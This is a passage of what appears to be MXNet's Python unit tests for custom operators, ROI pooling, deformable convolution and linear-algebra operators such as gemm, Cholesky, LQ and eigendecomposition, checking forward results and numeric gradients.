@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
    # test exception handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
                        # For now we only have a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
                                # if the following condition holds, the sampling location is not differentiable,
                                # so we have to redo the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
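# Rough summary of the check above: whenever a sampling location would land within
# 1e-3 of an integer grid line (where bilinear interpolation is not differentiable),
# the offsets for that bin are re-drawn and the bin is re-checked, so the numeric
# gradient test below only sees well-behaved sampling points.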
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
                    # at certain points the bilinear interpolation function may be non-differentiable;
                    # to avoid this, we check that the sampling locations fall on valid (differentiable) points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
                    # For now we only have a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = None, atol_fw = None,
rtol_bw = None, atol_bw = None, num_eps = None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
    # Check for a different axis that describes the matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
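# The helper above exercises linalg.gemm and linalg.gemm2 in all transpose
# combinations, in batch mode (rep_3x replicates each operand three times), and
# with the non-default `axis` argument selecting which axis holds the matrix rows.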
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_context().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
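# The mask above is assembled block by block from one-hot rows: after the loop,
# lt_mask is a lower-triangular matrix of ones (including the diagonal), which is
# transposed for the upper-triangular case and broadcast-multiplied into `a`.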
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
        # Note: the input has to be symmetrized for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
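# For the wide inputs (m <= n) used in test_laop_2, the group above should yield
# Q*Q^T = I (orthonormal rows of Q) and L*Q = A (the LQ reconstruction), which is
# what the forward checks compare against.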
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
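# Analogous combined symbol for syevd: for a symmetric input A = U^T diag(lam) U
# (the rows of U being the eigenvectors), the group yields U*U^T = I and
# U^T diag(lam) U = A, which the forward checks in test_laop_3 compare against.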
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
    # Currently disabled on GPU as these tests need CUDA 8,
    # and MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
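# Sign convention used by the reference eigendecomposition above: each eigenvector is
# flipped, if necessary, so that its entry of largest absolute value is non-negative;
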